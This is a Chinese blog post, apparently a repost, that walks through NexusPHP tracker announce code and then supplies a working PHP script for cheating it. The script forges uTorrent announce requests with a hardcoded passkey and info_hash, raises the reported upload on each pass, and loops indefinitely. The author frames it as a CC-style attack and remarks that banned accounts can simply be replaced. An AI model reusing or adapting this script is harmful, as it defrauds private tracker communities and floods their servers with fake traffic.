php remote trak,NexusPHP traker源码分析 模拟CC攻击

最新推荐文章于 2024-03-10 18:48:18 发布
最新推荐文章于 2024-03-10 18:48:18 发布
阅读量147 收藏
点赞数
文章标签: php remote trak

源码网上可以找

第一步 分析源码

//1.分析客户端 默认的允许的客户端请参照各大站

$agent = $_SERVER["HTTP_USER_AGENT"];

block_browser();

//2.分析参数 这几个参数必须有

foreach (array("passkey","info_hash","peer_id","event") as $x)

{

if(isset($_GET["$x"]))

$GLOBALS[$x] = $_GET[$x];

}

foreach (array("port","downloaded","uploaded","left","compact","no_peer_id") as $x)

{

$GLOBALS[$x] = 0 + $_GET[$x];

}

//3.端口 用常识填一个就行了

if (!$port || $port > 0xffff)

err("invalid port");

if (!ip2long($ip)) //Disable compact announce with IPv6

$compact = 0;

//中间发包间隔是30s 速度不超过100Mb/s

burp抓包确认

3ee6aef64e67d861e7b29faf29677df0.png

上传个源码。。。 请大家不要恶搞 谢谢 nexus就算被封号 一样可以有效上传 只要号足够多。。。你懂的

set_time_limit(0);

for ($i=1; $i < 100000000; $i++) {

shuafen3($i);

ob_flush();

flush();

sleep(40);

}

function shuafen3($i){

/*

伪造头 其实只要user agent 其他可以忽略

*/

$headers[‘User-Agent‘] = ‘uTorrent/342(109414725)(35141)‘;

$headerArr = array();

foreach( $headers as $n => $v ) {

$headerArr[] = $n .‘:‘ . $v;

}

/*

绝对不要用http_build_query() 会对参数和值encode 但是源码中并没有decode 会导致info_hash错误

所以拼url就可以

*/

$url = SITE_URL;

$url .= ‘passkey=e0d3629ea5ab14bb2c2f74a3ed48c696&‘;

$url .= ‘info_hash=E%00%b3%ca%de3W4%f7j%9b%7b%86G%fdV8%e9p%3c&‘;

$url .= ‘peer_id=-UT3420-E%89y%aaP%bfW%e0%a1%ed%d9W&‘;

$url .= ‘port=60579&‘;

$url .= ‘uploaded=‘.(0+$i*73400320).‘&‘;

$url .= ‘downloaded=0&‘;

$url .= ‘left=43399315456&‘;

$url .= ‘corrupt=0&‘;

$url .= ‘key=01E9E5A9&‘;

$url .= ‘event=started&‘;

$url .= ‘numwant=200&‘;

$url .= ‘compact=1&‘;

$url .= ‘no_peer_id=1‘;

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPHEADER, $headerArr);

curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);

//必须使用http 1.0 协议 1.1的协议会对数据压缩 traker不认

$response = curl_exec($ch);

if(curl_errno($ch)){

print curl_errno($ch).‘ - ‘.curl_error($ch);

echo curl_getinfo($ch, CURLINFO_HTTP_CODE);

}

curl_close($ch);

echo iconv("UTF-8", "GBK//IGNORE",$response).‘
‘;

}

?>

个人兴趣 和站长提了几个漏洞 被站长喷SB

原文:http://www.cnblogs.com/christian-ye/p/4078423.html

SUN也行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nexus源码解析 - 制品查看
未来的大鸟的博客
05-10 1107
最近一直在研究DevOps制品仓库相关的内容,打算从现在开始逐步完善对Nexus源码解析,从0开始吧,由于是第一次对源码进行解析,加上本身基础能力较为薄弱,如果有不对的地方,请大家多多指正。 此篇文章从页面作为入口,让我们看看Nexus后面究竟做了什么吧 访问浏览器 类名RepositoryBrowseResource 浏览器访问Nexus页面时的类 下面直接上源码 先看一些依赖以及定义的变量 //正则表达式,仓库路径 private static final String REPOSIT..
nexusphp源码
11-22
搭建PT站点所使用的开源源码nexusphp
NexusPHP官方版源码 v1.5
04-02
这是一款不错的NexusPHP官方版源码 v1.5源码,该源码也是最新版本的,BitTorrent private tracker scripts written in PHP. Email xiazuojie AT gmail.com for paid support. BitTorrent私有种子服务器PHP程序,邮件 xiazuojie AT gmail.com 获取付费支持。 安装环境配置: 配置环境可以选用apache+php+Mysql+memcache,推荐linux环境,代码执行效率更高。作者代码所提供的安装介绍也是在linux环境下的,而且全是英文介绍,这让我这六级不过的情何以堪啊,小小的鄙视下。。。 Windows下推荐win2003,如果你对PHP有一定了解,可以自己动手搭建IIS或apache+PHP+MysqL+memcache的环境,具体教程可以google。不过这种方法很繁琐,经常会出莫名其妙的错误,你要有心理的准备。 最好的方式是选用环境集成包,比如Apmserv5.2.6功能很全,支持apache+php+mysql+memcache,还有一个集成包,nginx+php+mysql+memcache,这个集成包相当简陋,只是各种包的聚合,没有控制界面和控制面板,使用起来很不方便。这应该是众多集成包里唯一两个支持memcache的集成包了。 好了,环境搭建完毕,解压程序包,然后导入数据库文件,(根目录_db下的dbstructure.sql文件)导入完毕后修改配置文件,在config文件下下面有一个allconfig.php 的文件,修改下面的内容: SITENAME => 站点名称 baseURL => 网站URL announce_url => localhost/announce.php(announce的url地址) mysql_host => MySQL主机 mysql_user=> 数据库用户名 mysql_pass => 数据库密码 mysql_db => 数据库名 以上无误的话应该就可以登陆NexusPHP的界面了,赶紧注册管理员账号吧。 好了,注册好用户名后,接着进入数据库管理(phpMyAdmin),在users表里面找到你注册的用户,编辑它的class属性为16,便是主管权限了。 还可以通过下面的方法设置: 1.使用正常方式在网站注册一个新用户,假设用户名为admin。 2.输入以下命令进入MySQL命令行管理工具: mysql -u root -p nexusrocks -h localhost 注意:将’root’,’nexusrocks’,’localhost’分别替换成你的MySQL用户名、密码、主机地址。 2.在MySQL命令行管理工具输入以下命令: USE nexus; UPDATE users SET class=’16′ WHERE username=’admin’; 注意:将以上命令中的’nexus’替换成你的数据库名,将’admin’替换成你注册的用户名。 3.退出MySQL命令行管理工具: 到这里PT基本上就架设完毕了,现在只需要利用主管帐号对站点进行设置和调整就可以了
nexusphp 开源的PT代码 内附使用说明书
01-02
PT是什么?我在PT下载介绍和PT程序源码下载 一文里面已经做了介绍,简单点说就是只下载不上传就会让踢掉的BT下载服务。
PHP怎么实现cc攻击,PHPCC攻击实现代码总结_PHP教程
weixin_34460480的博客
03-18 541
/** 防CC攻击郁闷到死,不死版。** 如果每秒内网站刷新次数超过2次,延迟5秒后访问。*/$cc_min_nums = ‘1’; //次,刷新次数$cc_url_time = ‘5’; //秒,延迟时间//$cc_log = ‘cc_log.txt’; //启用本行为记录日志$cc_for...
trak-io-api:Trak.io Api 客户端
06-24
Trak.io Api 客户端安装通过安装: { "require": { "cossou/trak-io-api-client": "1.0.*" }}可用的方法确认别名追踪注释distinct_id 渠道文档: : 例子快速示例: require_once 'vendor/autoload.php' ;use Cossou ...
trak.js, 通用分析事件跟踪 API.zip
09-18
trak.js, 通用分析事件跟踪 API trak.js-- 通用分析事件跟踪API包装器简单来说,trak.js 是任何分析API的包装。 默认情况下,它使用Google通用分析,但你可以以用旧的ga.js 或者者Google标签管理器来代替 Google ...
php-mp4info_jyvbce_php_
10-03
2. f6939746b1dabfeb791274ae1e43c30f.txt、e506313eae7cc7a901dd8c552a0e4746.txt、448198b5a5e610dab75db251543d066f.txt - 这些看似随机命名的文件可能是日志文件、临时文件或加密/哈希过的数据,具体用途需要...
mp4v2 2.0.0 源码
09-22
《深入解析mp4v2 2.0.0源码:多平台编译与核心功能探析》 mp4v2是一款开源的、强大的MP4文件处理库,它提供了对MP4格式的全面支持,包括读取、写入以及修改MP4文件的能力。在mp4v2 2.0.0版本中,开发者可以享受到...
安卓Android源码——android上实现mp4文件的高效率切割。.zip
10-10
5. **更新箱信息**:切割后,必须更新Moov箱内的信息,包括trak、mdia、mvex等子箱,以反映新的文件范围。这可能需要借助第三方库,如`mp4parser`。 6. **处理元数据**:如果切割涉及到元数据(如封面图片、元信息...
NEXUSPT:基于nexusphp的pt站系统
03-11
NEXUSPT 基于Nexusphp 要求 额外的 注意及时修改class_cache.php与class_cache_announce.php中第195行,选择合适的缓存器 并且还要修改allconfig.php中数据库连接部分, 验证码的话,如果开启海报验证,要等种子多个足够多才行, 默认账号测试密码测试
新版PHP防被CC攻击网站系统源码
07-09
源码仅支持PHP程序,类似百度云加速防CC访问机制,就能拦截大部分的CC攻击了。
php防止CC攻击代码 php防止网页频繁刷新
10-23
主要介绍了php防止CC攻击代码和php防止网页频繁刷新,网页快速恶意刷新,cc攻击利用代理服务器生成指向目标站点的合法请求,模拟多用户不停的对受害网站进行访问,感兴趣的小伙伴们可以研究一下
NexusPHP 0day漏洞分析4例
朔方飞絮谈安全
10-25 2597
2017年8月至9月朔方攻城狮利用工作空闲时间发现了 NexusPHP项目存在 SQL注入、XSS跨站脚本等多个零日代码攻击漏洞(0DAY),并获得4个CVE编号。正如TK教主所说:“喜悦主要来源漏洞本身,以及探索和挑战的过程,CVE不CVE并不会改变太多。这里小编将部分细节分享给大家,欢迎关注本号进行交流。
NexusPHP支持@功能
weixin_30725315的博客
05-21 493
@user文件包下载:点击下载 先下载@user文件包,将里面的三个文件上传至文件夹根目录(当然,js和css样式文件可以传到其它目录,确保路径正确就行了),这里为了省事,我上传的是根文件夹下面 1、修改include文件夹下面的functions.php文件 funtion.php搜索: 1 print("<td align=\"left\"><textarea c...
提升NexusPHP解析种子文件性能(优化benc.php)
真红酱の小窝
08-26 855
https://blog.rhilip.info/archives/1064/ 根据文章中的评测,NexusPHP(benc.php)的种子解析性能非常低,即Bencode解码能力很低,(编码能力与其他库文件性能差不多),因此这里对种子文件解码部分代码进行修改,并与NexusPHP做到最大兼容. https://raw.githubusercontent.com/Rhilip/RidPT/m...
php漏洞全解
热门推荐
Battery的博客
07-27 13万+
1、命令注入(CommandInjection)2、eval注入(EvalInjection)3、客户端脚本攻击(ScriptInsertion)4、跨网站脚本攻击(CrossSiteScripting,XSS)5、SQL注入攻击(SQLinjection)6、跨网站请求伪造攻击(CrossSiteRequestForgeries,CSRF)7、Session会话劫持(SessionHijacking)......
php-cc:git commit代码提交时进行PHP代码的语法检测和代码格式检查
书山路遥
03-18 1813
继上篇文章之后,我花了一些时间,写了一个简单的composer包。这个包可以自动配置git钩子,使得在commit的时候进行PHP代码的语法检查(phplint)和代码风格(phpcs)检查。这个工具同时还支持一些简单的配置,例如开启/关闭语法或者代码风格检查;支持自定义代码风格检查是使用的standard(例如PSR1,PSR2等等)。工具将会逐步完善。 工具安装 composer requ...
5秒盾防CC防火墙代码,PHP通用防火墙代码,WordPress5秒盾防火墙代码
云博客_资源宝分享
03-10 556
5秒盾防CC防火墙代码,PHP通用防火墙代码,WordPress5秒盾防火墙代码
uni trak减震
最新发布
08-17
uni-trac是一种先进的四轮驱动技术,由意大利汽车制造商马自达公司在某些车型上采用。它最初被称为Unlimited Traction Control System,简称为UNI-TRAC,主要用于提高车辆在湿滑、冰雪等复杂路面条件下的操控性能和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值